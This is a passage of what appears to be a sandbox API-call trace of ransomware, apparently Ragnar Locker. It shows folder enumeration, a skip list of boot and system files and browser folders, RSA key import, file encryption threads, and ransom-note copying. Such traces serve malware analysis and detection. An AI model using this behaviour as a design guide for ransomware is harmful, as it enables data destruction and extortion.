lpFilePart=0x5cfe338*="*.*") returned 0x22 [0170.529] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="SetupResources.dll" | out: lpString1="SetupResources.dll") returned="SetupResources.dll" [0170.529] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned=".dll" [0170.529] lstrcmpiW (lpString1="SetupResources.dll", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0170.529] lstrcmpiW (lpString1="SetupResources.dll", lpString2="autorun.inf") returned 1 [0170.529] lstrcmpiW (lpString1="SetupResources.dll", lpString2="boot.ini") returned 1 [0170.529] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootfont.bin") returned 1 [0170.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootsect.bak") returned 1 [0170.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr") returned 1 [0170.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgr.efi") returned 1 [0170.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2="bootmgfw.efi") returned 1 [0170.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2="desktop.ini") returned 1 [0170.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2="iconcache.db") returned 1 [0170.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntldr") returned 1 [0170.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat") returned 1 [0170.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.dat.log") returned 1 [0170.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2="ntuser.ini") returned 1 [0170.530] lstrcmpiW (lpString1="SetupResources.dll", lpString2="thumbs.db") returned -1 [0170.530] lstrcmpiW (lpString1=".dll", lpString2=".db") returned 1 [0170.530] lstrcmpiW (lpString1=".dll", lpString2=".sys") returned -1 [0170.530] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0170.530] FindNextFileW (in: hFindFile=0x3547f40, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0170.530] GetProcessHeap () returned 0x3520000 [0170.531] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x3586920 [0170.531] CryptAcquireContextW (in: phProv=0x3586920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3586920*=0x3556e58) returned 1 [0170.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0170.532] GetProcessHeap () returned 0x3520000 [0170.532] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x35c9958 [0170.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x35c9958, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0170.532] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0170.532] GetProcessHeap () returned 0x3520000 [0170.532] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35948f0 [0170.532] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35948f0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35948f0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0170.532] GetProcessHeap () returned 0x3520000 [0170.532] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35c9958 | out: hHeap=0x3520000) returned 1 [0170.532] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35948f0, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0170.532] CryptImportPublicKeyInfo (in: hCryptProv=0x3556e58, dwCertEncodingType=0x1, pInfo=0x357fc90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x357fcc0*, PublicKey.cbData=0x10e, PublicKey.pbData=0x357fcc8*, PublicKey.cUnusedBits=0x0), phKey=0x3586924 | out: phKey=0x3586924*=0x3547e80) returned 1 [0170.533] GetProcessHeap () returned 0x3520000 [0170.533] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35948f0 | out: hHeap=0x3520000) returned 1 [0170.533] LocalFree (hMem=0x357fc90) returned 0x0 [0170.533] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x35564c8) returned 1 [0170.534] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0170.534] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0170.534] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0170.537] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x35567f8) returned 1 [0170.538] CryptGenRandom (in: hProv=0x35567f8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0170.538] CryptReleaseContext (hProv=0x35567f8, dwFlags=0x0) returned 1 [0170.538] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0170.541] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556ee0) returned 1 [0170.542] CryptGenRandom (in: hProv=0x3556ee0, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0170.542] CryptReleaseContext (hProv=0x3556ee0, dwFlags=0x0) returned 1 [0170.543] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0170.546] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556880) returned 1 [0170.546] CryptGenRandom (in: hProv=0x3556880, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0170.546] CryptReleaseContext (hProv=0x3556880, dwFlags=0x0) returned 1 [0170.546] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0170.549] CryptEncrypt (in: hKey=0x3547e80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0170.551] GetLastError () returned 0x80090016 [0170.551] CryptEncrypt (in: hKey=0x3547e80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0170.551] GetLastError () returned 0x80090016 [0170.551] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0xf4) returned 0x3b4 [0170.552] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3556990) returned 1 [0170.553] CryptGenRandom (in: hProv=0x3556990, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0170.553] CryptReleaseContext (hProv=0x3556990, dwFlags=0x0) returned 1 [0170.553] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0170.569] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x35565d8) returned 1 [0170.570] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0170.570] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0170.570] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0170.580] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x35565d8) returned 1 [0170.581] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0170.581] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0170.581] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0170.622] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x35564c8) returned 1 [0170.622] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0170.622] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0170.622] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0170.625] CryptEncrypt (in: hKey=0x3547e80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0170.626] GetLastError () returned 0x80090016 [0170.626] CryptEncrypt (in: hKey=0x3547e80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0170.626] GetLastError () returned 0x80090016 [0170.626] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0xf00) returned 0x3f0 [0170.628] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3b4, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0171.206] GetProcessHeap () returned 0x3520000 [0171.206] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3586920 | out: hHeap=0x3520000) returned 1 [0171.206] CloseHandle (hObject=0x3b4) returned 1 [0171.206] GetProcessHeap () returned 0x3520000 [0171.206] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0171.208] CloseHandle (hObject=0x3f0) returned 1 [0171.208] GetProcessHeap () returned 0x3520000 [0171.208] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0171.230] FindClose (in: hFindFile=0x3547f40 | out: hFindFile=0x3547f40) returned 1 [0171.230] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1031", cAlternateFileName="")) returned 1 [0171.231] lstrcmpiW (lpString1="1031", lpString2=".") returned 1 [0171.231] lstrcmpiW (lpString1="1031", lpString2="..") returned 1 [0171.231] lstrcmpiW (lpString1="1031", lpString2="Windows") returned -1 [0171.231] lstrcmpiW (lpString1="1031", lpString2="Windows.old") returned -1 [0171.231] lstrcmpiW (lpString1="1031", lpString2="Tor browser") returned -1 [0171.231] lstrcmpiW (lpString1="1031", lpString2="Internet Explorer") returned -1 [0171.231] lstrcmpiW (lpString1="1031", lpString2="Google") returned -1 [0171.231] lstrcmpiW (lpString1="1031", lpString2="Opera") returned -1 [0171.231] lstrcmpiW (lpString1="1031", lpString2="Opera Software") returned -1 [0171.231] lstrcmpiW (lpString1="1031", lpString2="Mozilla") returned -1 [0171.231] lstrcmpiW (lpString1="1031", lpString2="Mozilla Firefox") returned -1 [0171.231] lstrcmpiW (lpString1="1031", lpString2="$Recycle.Bin") returned 1 [0171.231] lstrcmpiW (lpString1="1031", lpString2="ProgramData") returned -1 [0171.231] lstrcmpiW (lpString1="1031", lpString2="All Users") returned -1 [0171.231] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0171.231] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1031" | out: lpString1="1031") returned="1031" [0171.231] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1031", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1031\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\" [0171.231] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1031\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1031\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\" [0171.231] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1031\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1031\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\!$R4GN4R_B8CF767A$!.txt" [0171.231] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1031\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0171.252] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1031\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1031\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1031\\*.*" [0171.252] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1031\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0171.253] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0171.253] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0171.253] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547c00 [0171.253] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0171.253] FindNextFileW (in: hFindFile=0x3547c00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf36a32e5, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.255] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0171.255] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0171.255] FindNextFileW (in: hFindFile=0x3547c00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf366ade7, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf366ade7, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0171.255] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0171.255] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0171.255] FindNextFileW (in: hFindFile=0x3547c00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0171.255] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0171.255] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0171.255] FindNextFileW (in: hFindFile=0x3547c00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141aa, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0171.255] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0171.255] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0171.255] FindNextFileW (in: hFindFile=0x3547c00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0171.255] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0171.255] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0171.255] FindNextFileW (in: hFindFile=0x3547c00, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0171.255] FindClose (in: hFindFile=0x3547c00 | out: hFindFile=0x3547c00) returned 1 [0171.255] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3548180 [0171.256] FindNextFileW (in: hFindFile=0x3548180, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf36a32e5, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf36a32e5, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0171.256] FindNextFileW (in: hFindFile=0x3548180, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf366ade7, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf366ade7, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0171.256] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1031\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0171.256] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0171.256] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1031\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0171.256] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0171.256] FindNextFileW (in: hFindFile=0x3548180, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd5b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0171.256] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1031\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0171.256] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0171.256] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf") returned=".rtf" [0171.256] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0171.256] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0171.256] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0171.256] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0171.256] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0171.256] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0171.256] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0171.256] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0171.256] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0171.256] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0171.256] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0171.256] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0171.257] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0171.257] lstrcmpiW 